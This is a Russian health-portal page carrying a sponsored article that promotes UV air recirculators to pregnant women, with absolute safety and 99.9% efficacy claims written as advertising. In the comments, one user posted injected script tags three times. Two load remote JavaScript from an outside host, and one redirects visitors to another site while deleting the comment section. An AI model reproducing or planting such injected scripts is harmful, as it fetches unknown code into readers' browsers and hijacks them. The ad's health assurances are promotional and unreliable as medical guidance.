Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Беременность: как обезопа...  >>  Беременность: как обезопасить себя и будущего малыша от вирусов
 
Обратная связь
 

Беременность: как обезопасить себя и будущего малыша от вирусов

Размер шрифта
08 декабря 2014 00:00
  • google_analytics: false
  • Нравится

Беременность – это не только самое прекрасное время в жизни любой женщины, но и самое ответственное, ведь теперь будущая мамочка должна заботиться не только о своем самочувствии, но и о самочувствии своего будущего малыша.

Но зачастую, даже при самом тщательном контроле здоровья, можно подхватить простуду, особенно, если беременность приходится на пик сезонных вирусных заболеваний. Как уберечь себя и своего будущего малыша от инфекции?

Чистый воздух – враг микробов

Так как большинство опасных для беременных вирусных заболеваний передаются воздушно-капельным путем, в первую очередь будущая мама должна дышать чистым и свежим воздухом не только на природе, но и дома. Предупредить распространение вирусов и болезнетворных бактерий можно с помощью бактерицидного рециркулятора, прибора, обладающего высокой эффективностью обеззараживания воздуха в жилых помещениях.

Каким образом происходит очистка воздуха?

Обеззараживание воздуха происходит в результате воздействия на него ультрафиолетовых лучей, которые производят лампы, помещенные в корпус прибора. Современные модели облучателей-рециркуляторов способны уничтожить 99,9% вредоносных вирусов и бактерий, включая возбудителей гриппа, ОРВИ, пневмонии и туберкулеза. Таким образом, вы можете быть уверены, что воздух, выдуваемый в комнату через вентиляционные отверстия рециркулятора, чист, свеж и пригоден для дыхания, а это особенно важно, если в семье кто-то заболел.

А безопасно ли?

В первую очередь будущая мамочка задаст именно этот вопрос, ведь в сознании многих прочно укрепился стереотип о том, что самый эффективный и быстрый способ борьбы с чем-либо обязательно должен быть химическим и вредным. Это далеко не так! Бактерицидные облучатели-рециркуляторы подходят для дезинфекции воздуха в помещениях даже в присутствии людей, обладающих повышенной чувствительностью к ультрафиолету. Благодаря особой конструкции корпуса устройства, а также форме вентиляционных отверстий, вероятность попадания неблагоприятно воздействующих ультрафиолетовых лучей в помещение полностью исключается.

Другие преимущества рециркуляторов воздуха

Во время беременности в организме женщины происходят колоссальные изменения – меняется восприятие запахов и вкусов, вызывают раздражение звуки, на которые прежде не обращалось никакого внимания. Бактерицидный рециркулятор работает беззвучно, не выделяя каких-либо специфических запахов и вредных веществ в процессе обеззараживания воздуха, тем самым обеспечивая незримую защиту и абсолютный комфорт находящимся в помещении людям. Более того, рециркулятор пригодится и после рождения вашего малыша, ведь в первые месяцы жизни ему особенно понадобится надежная защита от вирусов и бактерий. Он прост в управлении, работает от обычной электросети, а выбрав портативную модель прибора, вы сможете с легкостью подключать его в нужном вам помещении.

Приобретая бактерицидный рециркулятор воздуха, вы делаете долгосрочное вложение в свое здоровье не только на время беременности, но и в послеродовой период, а также создаете безопасную среду для жизни и развития вашего малыша.

У вас есть вопросы? Компания «Армед» ответит на них по телефону горячей линии 8-800-301-89-88 или на сайте.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Violensa

19 декабря 2014 в 13:22

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
С какого возраста малышам можно давать иммуномодуляторы?   Худшая еда для беременной   Можно ли заболеть гриппом или другими ОРВИ в теплое время года? Какой препарат лучше принимать для профилактики?   Курение во время беременности сделает вашего ребенка шизофреником  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Можно ли подгадать с беременностью?
Мальчик или девочка? 6 мифов!

Тесты

1
Кофеин вызывает зависимость?
Будет ли у вас инфаркт?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.